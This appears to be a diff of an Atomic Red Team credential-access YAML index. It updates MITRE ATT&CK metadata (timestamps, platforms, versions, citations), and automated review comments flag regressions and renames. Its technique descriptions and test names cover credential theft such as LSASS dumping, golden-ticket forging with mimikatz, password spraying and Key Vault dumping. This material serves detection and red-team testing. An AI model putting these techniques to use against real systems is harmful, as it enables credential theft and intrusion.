- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -92549,9 +93315,8 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests:
- name: Private Keys
@@ -92983,7 +93748,7 @@ credential-access:
elevation_required: true
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
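Review bot: the `modified` timestamp for T1557.001 moves backwards, from `2023-04-25T14:00:00.188Z` to `2022-10-25T15:46:55.393Z`, while `x_mitre_attack_spec_version` in the following hunk stays at `3.0.0`; every other technique in this diff moves forward to a 2024 date and spec `3.2.0`. That pattern suggests this object was regenerated from an older STIX bundle than the rest, so check which ATT&CK release the script read for this technique before merging a downgrade as if it were a refresh.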
@@ -93091,7 +93856,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests:
- name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -93110,7 +93874,7 @@ credential-access:
elevation_required: true
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -93147,6 +93911,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -93159,7 +93924,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -93209,7 +93974,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
@@ -93696,7 +94460,7 @@ credential-access:
elevation_required: true
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -93722,6 +94486,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -93737,18 +94502,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -93775,9 +94540,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests:
- name: Password Spray all Domain Users
@@ -94126,7 +94888,7 @@ credential-access:
elevation_required: false
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -94137,13 +94899,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -94157,6 +94919,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -94167,12 +94930,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -94247,7 +95010,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests:
- name: Cached Credential Dump via Cmdkey
@@ -94309,7 +95071,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
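Review bot: `modified` for T1558.001 regresses from `2022-04-25T14:00:00.188Z` to `2020-11-05T16:07:03.779Z`, a step back of well over a year rather than an update, and no `x_mitre_version` bump accompanies it. Please confirm the upstream source for this object; a regeneration that overwrites a newer `modified` value with an older one will also revert any description or data-source edits that came with the later revision.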
@@ -94344,8 +95106,6 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests:
- name: Crafting Active Directory golden tickets with mimikatz
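Review bot: `x_mitre_attack_spec_version: 2.1.0` and `spec_version: '2.1'` are deleted for T1558.001 with no `x_mitre_attack_spec_version: 3.2.0` added in their place, unlike every other technique in this diff, while `x_mitre_permissions_required: User` is retained; the object ends up in a mixed state with old-schema fields kept and the version fields gone. Either regenerate it from the same bundle as the neighbouring techniques or leave the object untouched rather than half-migrating it.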
@@ -94511,10 +95271,10 @@ credential-access:
$env:TEMP\\golden.txt -ErrorAction Ignore\n"
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
@@ -94524,21 +95284,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -94587,9 +95349,6 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests:
- name: Staging Local Certificates via Export-Certificate
@@ -94614,26 +95373,7 @@ credential-access:
name: powershell
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -94648,20 +95388,38 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests:
- name: Search Through Bash History
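Review bot: the citation URL for `External to DA, the OS X Way` changes from `http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way` to `https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418` with a new `Retrieved September 12, 2024` date; unlike the lockstepgroup and Kaspersky links earlier in this diff, which were swapped for `web.archive.org` snapshots, this one points at the live SlideShare path and will break again on the next URL-scheme change. Consider recording an archive.org capture for it as was done for the other two.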
@@ -94721,7 +95479,7 @@ credential-access:
name: sh
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -94795,7 +95553,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests:
- name: Find AWS credentials
@@ -95059,11 +95816,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -95112,6 +95868,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -95120,6 +95877,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -95130,13 +95888,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
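Review bot: `IaaS` is added to `x_mitre_platforms` for T1528 alongside the `Office Suite`/`Identity Provider` consolidation, which means this technique and its atomic test `Azure - Dump All Azure Key Vaults with Microburst` now belong in the IaaS view as well; make sure the per-platform index files are regenerated in the same commit so the YAML lists IaaS while the IaaS index still omits the test. The `x_mitre_version` bump from `1.3` to `1.4` is consistent with a platform change and is fine.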
@@ -95192,9 +95951,6 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests:
- name: Azure - Dump All Azure Key Vaults with Microburst
@@ -95268,37 +96024,7 @@ credential-access:
elevation_required: true
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -95315,20 +96041,49 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests:
- name: GPP Passwords (findstr)
@@ -95407,7 +96162,7 @@ credential-access:
name: powershell
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
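Review bot: the `modified` value for T1556.008 moves backwards, from '2023-10-31T14:00:00.188Z' to '2023-05-04T18:02:51.318Z', and other objects in this change do the same (T1557.002 and T1558.002 below). Several of the removed timestamps, here and for T1557.002, T1056 and T1111, share the identical `14:00:00.188Z` time of day, which looks like a synthetic value from the previous generator rather than upstream data, so the regression is probably a correction; a sentence in the commit message saying so would save the next reviewer the check.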
@@ -95482,11 +96237,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -95530,11 +96284,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
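Review bot: this hunk replaces the `Azure AD`, `Office 365` and `Google Workspace` platform entries for T1606 with `Office Suite` and `Identity Provider` and bumps `x_mitre_version` to 1.5. The same substitution recurs for T1621, T1110, T1110.004 and T1556.006 further down, so any index, filter or documentation keyed on the old platform strings needs the matching rename in this change; otherwise those techniques silently drop out of per-platform views.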
@@ -95558,8 +96311,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
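Review bot: the `GitHub AWS-ADFS-Credential-Generator` reference changes repository owner, from `damianh` to `pvanbuijtene`, with a new retrieval date of September 27, 2024, while the citation line still reads `Damian Hickey. (2017, January 28)`. That reads as a fork or transfer; confirm the new URL resolves to the same project and not to an unrelated fork before the old link is lost.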
@@ -95575,11 +96328,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -95590,11 +96342,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
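Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here between `kill_chain_phases` and `x_mitre_contributors` while its previous position at the bottom of the T1621 object is deleted two hunks later, and `x_mitre_modified_by_ref` moves the same way; the values do not change. Key order is being taken from the upstream bundle object by object, which is why most of this change is churn. If the generator emitted keys in a fixed order (or sorted them), diffs like this one would show only real content changes.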
@@ -95604,16 +96358,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -95651,13 +96405,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -95666,6 +96417,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -95673,11 +96425,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -95695,13 +96447,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -95714,6 +96463,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
